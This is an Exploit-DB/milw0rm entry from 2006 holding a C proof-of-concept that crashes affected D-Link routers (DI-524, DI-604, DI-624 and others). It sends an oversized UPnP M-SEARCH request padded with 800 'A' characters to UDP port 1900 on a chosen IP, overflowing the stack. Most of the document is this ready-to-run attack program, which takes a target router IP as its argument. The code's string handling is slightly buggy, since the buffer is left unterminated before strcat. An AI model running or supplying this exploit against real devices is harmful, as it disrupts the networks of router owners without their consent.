D-Link Devices - UPNP Stack Overflow Denial of Service (PoC)

EDB-ID:

2059

CVE:

N/A


Author:

ub3rst4r

Type:

dos


Platform:

Hardware

Date:

2006-07-22


/* routers affected from eEye's advisory. /str0ke
Routers Affected:
DI-524 Rev A
DI-524 Rev C
DI-524 Rev D
DI-604 Rev E
DI-624 Rev C
DI-624 Rev D
DI-784 Rev A
EBR-2310 Rev A
WBR-1310 Rev A
WBR-2310 Rev A
*/

/*
 * D-Link Router UPNP DOS PoC
 * Written By: ub3rst4r aka DiGiTALST*R
 * Tested Against: DI-524 Rev. A
 *
 * A remote stack overflow exists in a range of wired and wireless D-Link 
 * routers. This vulnerability allows an attacker to execute privileged code
 * on an affected device. Although a stack overflow does exist, debugging this 
 * vulnerabilty requires additional external hardware.
 * 
 * NOTE: You might need to try sending this twice, or use 239.255.255.250
 *
 * Credits: eEye Digital Security
 *
 */

#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")

int main(int argc, char **argv)
{
    WSADATA wsa;

    char buf[896];
    
    int sockfd;
    struct sockaddr_in serv_addr;

    int ret;
    
    if (argc < 2) {
        printf("Usage: dlinkdos <router ip>\n");
        return 0;
    }
    
    WSAStartup(MAKEWORD(1,1), &wsa);

    // the main string
    memcpy(buf, "M-SEARCH ", 9);
    memset(buf+9, 'A', 800);
    memcpy(buf+809, " HTTP/1.1\r\n", 10);
    
    // extra data
    strcat(buf,
        "Host:239.255.255.250:1900\r\n"
        "ST:upnp:rootdevice\r\n"
        "Man:\"ssdp:discover\"\r\n"
        "MX:3\r\n"
        "\r\n"
        "\r\n");

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(1900);
    serv_addr.sin_addr.s_addr = inet_addr(argv[1]);
    memset(&serv_addr.sin_zero, '\0', 8);
                     
    ret = sendto(sockfd,buf,sizeof(buf),0,(struct sockaddr *)&serv_addr, sizeof(struct sockaddr));
    if (ret <= 0) {
        printf("failed to send request\n");
        return 0;
    } 
    
    printf("request sent!\n");
    
    WSACleanup();
    
    return 0;
}

// milw0rm.com [2006-07-22]